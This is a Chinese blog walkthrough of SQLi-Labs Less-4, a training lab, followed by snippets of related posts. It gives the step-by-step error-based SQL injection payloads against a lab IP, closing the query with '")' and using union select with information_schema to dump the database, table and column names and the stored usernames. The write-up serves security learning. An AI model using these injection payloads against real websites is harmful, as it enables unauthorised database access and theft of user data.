【SQLI-Lab】-Less4

最新推荐文章于 2022-04-10 20:19:04 发布
最新推荐文章于 2022-04-10 20:19:04 发布
阅读量218 收藏
点赞数 1
分类专栏: sqli 漏洞注入通关宝典 文章标签: 渗透测试 mysql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xinyue9966/article/details/113062139
版权

Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

前言

一、GET字符型注入

执行数据库查询,并在回显点展示。
用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。

二、步骤

通过报错判断类型和闭合

http://192.168.135.149/sqli/Less-4/?id=1"

在这里插入图片描述

发现为字符型,进一步查看回显

http://192.168.135.149/sqli/Less-4/?id=1") and 1=1 -- 1

在这里插入图片描述

发现存在注入点

http://192.168.135.149/sqli/Less-4/?id=1") and 1=2 -- 1

在这里插入图片描述

判断列数

http://192.168.135.149/sqli/Less-4/?id=1") group by 3 -- 1

爆库名payload

http://192.168.135.149/sqli/Less-4/?id=-1") union select 1,database(),3 -- 1

在这里插入图片描述

爆表名payload

http://192.168.135.149/sqli/Less-4/?id=-1") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3 -- 1

在这里插入图片描述

爆列名payload

http://192.168.135.149/sqli/Less-4/?id=-1") union select 1,(select group_concat(column_name) from information_schema.columns where table_name="users"),3 --+

在这里插入图片描述

爆username列的数据值payload

http://192.168.135.149/sqli/Less-4/?id=-1") union select 1,(select group_concat(`username`) from security.users),3 -- 1

在这里插入图片描述

总结

报错除去’之外,可多尝试不同字符,此处"报错成功,积累多种报错经验,对于报错语句熟练应用即可完成。

幸运之河
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs—————Less-4
Fly_鹏程万里
05-08 664
Less4根据要求传入参数id,数据类型numeric添加单引号、and 1=1  、and 1=2进行测试感觉是不是非常奇怪,为什么都是正确显示页面呢?我们不妨再试试双引号注入代码之后,我们得到了下面这个错误You have an error in your SQL syntax; check the manual that corresponds to your MySQL server ve...
sqli-labs less3/4打靶笔记
qq_42562304的博客
06-11 612
由此可初步判断为单引号变形字符型注入。 由此可判断列数为3列。 可以得出显示位为2、3位。 由此可判断为括号双引号字符型注入。 由此可见查询字段数为3。 5.爆表名。 6.爆列名。 7.爆user表敏感数据。 SQL注入的步骤如下: 如上所述,SQL注入一般为以上7个步骤,首先判断是否存在注入点,然后判断查询的字段数,接着判断显示位,最后通过函数、information_schema的三张表依次爆出库名、表名、列名及具体的数据。 只要牢记这7个步骤,脱裤不是梦!!!......
sqli-labs-less-4图文详解,适合小白
yzcn
10-23 1440
Less-4 less1-3以发布,1-4题相关知识点在https://blog.csdn.net/qq_46432288/article/details/109226871中,点击查看吧!!! less-4与1-3方法基本一致,只是最开始的判断注入点有一点差别。 判断注入: http://127.0.0.1/sqli-labs-master/Less-4/?id=1 显示正常 http://127.0.0.1/sqli-labs-master/Less-4/?id=1’ 显示正常 http://12
学会如何使用LESS(四)----函数库
NINE-NINE的博客
06-09 1174
学会如何使用LESS(四)----函数库
sqli-labs (less1-less4)
Xi4or0uji
07-24 1723
就只是随便记一记 less 1 get方法的引号闭合 id=1'有报错,证明有注入点,然后接下来是看一下有多少列 ?id=-1' union select 1,2,3--+' 这里我们如果只是写select后面加三个以下数字都会报错,证明里面是有三列的,用order by 也可以查出来 剩下的就是爆数据库,表,字段,值了 爆数据库 ?id=-1' union select 1,gr...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
sqli-lab操作详解
07-12
本篇文章将详细讲解SQL注入漏洞以及如何在`sqli-lab`这个实践环境中进行操作。 一、SQL注入的理解 SQL注入的基本原理是利用程序对用户输入数据的不当处理,使得恶意SQL代码能够与服务器上的数据库交互。当Web应用未...
Sqli-Labs闯关—Less4
weixin_39157582的博客
08-19 161
Sqli-Labs闯关—Less4 基于错误的GET双引号字符型注入 (1)判断注入类型 输入?id=1"发现页面报错,看到括号,怀疑sql语句是以括号)闭合的。 输入?id=1")- -+发现页面回显正常,说明sql语句是以("")闭合的。 (2)使用order by判断列数 输入order by 3页面回显正常,输入order by 4页面回显不正常,说明列数为3。 (3)判断显示位 将参数id改成一个不存在的值-1,使第一个select查询结果为空。使用union selec
SQLi LABS Less-3 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-19 1万+
sqli第三关,sqli-labs less 3,sqlilabs less3
sql注入系列之Sqli-labs(less-4)
BetsyMyGirl的博客
12-06 864
看完不会来打我
SQLi-LABS Less-3&&Less-4
m0_64898960的博客
04-10 306
SQLi-LABS Less-3&&Less-4
sqli-lab 闯关教程 Less-4
羽路星尘的博客
11-01 212
每天一个注入小实验,过程仅供参考,如有建议或指正欢迎留言,对本文风格的建议也可以留在评论区哟。
less 4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)
TYW168168的博客
05-10 230
1、单引号 变成双引号 $id = '"' . $id . '"';$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1"; 转载于:https://www.cnblogs.com/yilishazi/p/9020744.html
宝,我今天注入了,注入的想你的液[SQL注入之sqli-labs(Less1-6)]
MachineGunJoe666
06-17 540
什么是SQL注入 在开始靶场之前,先要清楚什么是SQL注入,可能大多数朋友都已经了解,但要给刚开始学习注入的朋友提一下,虽然不见得能起多大作用,但却能很好地帮助我们开始入门学习。SQL注入:SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 简单来说,就是网站的后台程序过于信赖用户的输入,没有对
sqli-labs:less-4(双引号报错注入)
羽的博客
07-13 207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqli-labs】Less1~Less4
weixin_33980459的博客
08-13 60
学习sql注入啦,一下都是我做sqli-labs时的笔记。可能有错误,如果有人发现了欢迎指正~~   常用知识点: 1.mysql注释有三种:① #: 注释从#到行尾                                  ② --空格: 注释到行尾,注意--后必须有空格                                  ③/**/ :注释/* 到 */的内容 2.查询用...
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值